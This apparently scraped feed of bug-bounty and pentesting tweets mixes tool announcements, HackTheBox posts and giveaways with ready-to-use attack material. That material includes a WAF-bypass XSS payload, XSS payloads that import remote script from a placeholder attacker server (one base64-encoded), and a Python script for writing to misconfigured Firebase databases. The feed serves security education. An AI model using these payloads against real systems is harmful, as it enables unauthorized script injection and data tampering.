zzzZ

Hi everyone 👋🦀 New repo for RustHound-CE, this version is only compatible with BloodHound-CE: github.com/g0h4n/RustHoun… Many thanks to @f3rn0s for code refactoring! And many thanks to NeverHack! I'll be handing over development of the project from today.

If the WAF doesn't allow the creation of a JavaScript term like 'alert' or 'confirm' in any way, write it inverted and then use reverse() with self[]. Payload: <a%20href=%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)> #Bugbounty #AkamaiBypass

NetExec Version 1.3.0 has been released🔥 Biggest new features: - New NFS protocol - SCCM Enumeration - Coercer_plus module For the detailed release notes check out: github.com/Pennyw0rth/Net… Or our wiki as soon as a feature rundown is available.

@hackthebox_eu now,is netexec

You gotta ADmit these tools are a must-have 💥 From #bloodhound to #ADExplorer, here's everything you need for your next enumeration session. How familiar are you with them? Learn how to pentest complex Active Directory infrastructures: okt.to/cE0wCq #HackTheBox #HTB

I just pwned Monteverde in Hack The Box! hackthebox.com/achievement/ma… #hackthebox #htb #cybersecurity

I just pwned Forest in Hack The Box! hackthebox.com/achievement/ma… #hackthebox #htb #cybersecurity

[1/3] Found a Crazy XXE/SQL injection while hunting a random web application. 💉XXE Injection via Out-Of-Band-SQL Injection in Oracle Based Database 😈 Below 💊 payload allowed me to get the Hostname by using 𝗦𝗬𝗦_𝗖𝗢𝗡𝗧𝗘𝗫𝗧 which is a in-built function in Oracle SQL.

@chux13786509 /find?key=%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E

Another day another bug 🔥 Just found this code in open source web app (and changed a little bit before publishing). Can you spot the vulnerability? Write down your payload for exploiting it 🥷 Share for more interesting payloads in the comments 🤓 #bugbounty #Hacking

Here's a full guide and methodology for beginners on how to look for reflective XSS vulnerabilities! 🤑 A thread! 🧵 👇

Great Tip by @DhabaleshwarD ✌️💥 I came across a very interesting vulnerability that many people overlook during mobile penetration testing: "Misconfigured Firebase DB Takeover." Firebase is a cloud-based NoSQL Database that stores and syncs data in real time among users. Sometimes, developers fail to configure it correctly according to best practices. This oversight can lead to misconfigurations. I've encountered and exploited numerous instances of these vulnerabilities in my pentesting experiences. Today, I'll explain how you can do it too. Let's dive into the steps to test it out. PoC Steps: 1- First, decompile the apk file using apktool. apktool d example.apk 2- Go inside the decompiled folder and use the grep command to search for "firebaseio.com" keyword: grep -iR firebaseio (You'll find the firebase url if the application is using any. If you feel this step is complicated, then you can use MobSF and it will directly give you the firebase url. Also, note most of the time you'll find the firebase url in "res/values/strings.xml" file.) 3- Now, I found the firebase url, let's say: https://example-db .firebaseio .com/ 4- The next step would be, to paste this URL in the browser along with a "/.json" at the end, which will look something like this: https://example-db.firebaseio .com/.json (Appending /.json at the end of a Firebase URL means that you're accessing data in JSON format from Firebase's Realtime Database.) 5- Now, let's take three scenarios: 5.1- If you are able to access the information inside it, that would mean, the database info is public. Which is a High severity vulnerability you can directly report. (But I bet this isn't something you'll generally find) 5.2- If you don't see any info, but simply "null", that means we can proceed with our attack. 5.3- If you see "Permission Denied", that means, the database is properly configured and you can't perform the takeover attack. 6- We will focus on the second scenario, where you see a "null" option. It generally indicates that you have read access to the Firebase Realtime Database but there is no data stored at the root level. 7- Now, for performing the Takeover attack. I created a simple python script, to help me out. Save the code below to a ".py" file and execute it. [It will work only if write perm. is enabled] import requests url = "https://example-db. firebaseio.com/.json" data = {"Exploit": "Successfull", "DATABASE TAKEOVER BY": "Dhabal"} try: response = requests.put(url, json=data) print("Database takeover successful.") if response.status_code == 200 else print(f"Failed: {response.status_code}") except requests.RequestException as e: print(f"Error: {e}") (If you feel this is complicated, then you can use simple curl command to do the same thing, without the need for a python script) 8- After that, visit the url "https://example-db. firebaseio.com/.json" and you should see the data we added. I hope you learnt something valuable today! #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp

@hackviserr The volumes section is used to mount directories from the host system into the container. In this case, the root directory of the host system (/) is being mounted into the container at the /files directory.

New challenge 🔥 Spot the vulnerability and explain it to win 1-month VIP membership on Hackviser! 🎉 #cybersecurity #cybersecuritytips #bugbounty

Destined One, come embark on this journey with us in our first ever exclusive campaign! Explore the mythology surrounding Sun Wukong and immerse yourselves in the rich world of mythology. Event 1: Submit videos for a chance to win a RTX 4070 Super Graphics Card, Official Merch, Collaboration Opportunity! Event 2: Follow us and retweet this post for a chance to win Official Merch! Note: 18+ only. No language/country restrictions. Ends on June 23. For more details: bit.ly/BlackMythWukon… #BlackMythWukong #Wukong #Monkeyking

📣 To celebrate three million of us, we’re giving away limited-edition t-shirts and annual subscriptions throughout our social channels. Like and retweet to be in with the chance of winning! 😉

@sumit_cfe @intigriti @memdotai mem it

Test Cases for Email Address Functionality Some Email based Payloads for Different Vulnerabilities created by @intigriti #bugbounty #bugbountytips #sqli

@cyb_detective @binitamshah @memdotai mem it

Nmap Formatter A tool to convert NMAP scan results into different formats: - html - csv - Markdown - json - svg (Graphviz) - sqlite github.com/vdjagilev/nmap… Tip by @binitamshah

@ReconOne_bk @memdotai mem it

How to fuzz a list of Web Servers using #ffuf and leaky-paths wordlists. This one-liner creates an output file for each target. 👇💣 #recontips #bugbountytips #bugbounty #AttackSurface

I just completed module Introduction to Academy in HTB Academy! academy.hackthebox.com/achievement/11… #hackthebox #htbacademy #cybersecurity

@sumit_cfe @memdo mem it

Some GitHub Dorks #bugbounty #vulnerability #githubtesting

@0x0SojalSec @memdotai mem it

RCE vulnerability checklist 📔 #infosec #bugbountytips #cybersec

@bugoverfl0w @memdotai it

XSS tips to load external code js <img src=x onerror=import('//your-server.com/xss-code')> In some case the server recognize / will break the code, using this one <img sRc=OnXSS OnError=import(atob('Ly95b3VyLXNlcnZlci5jb20v'))> 1/n #bugbountytips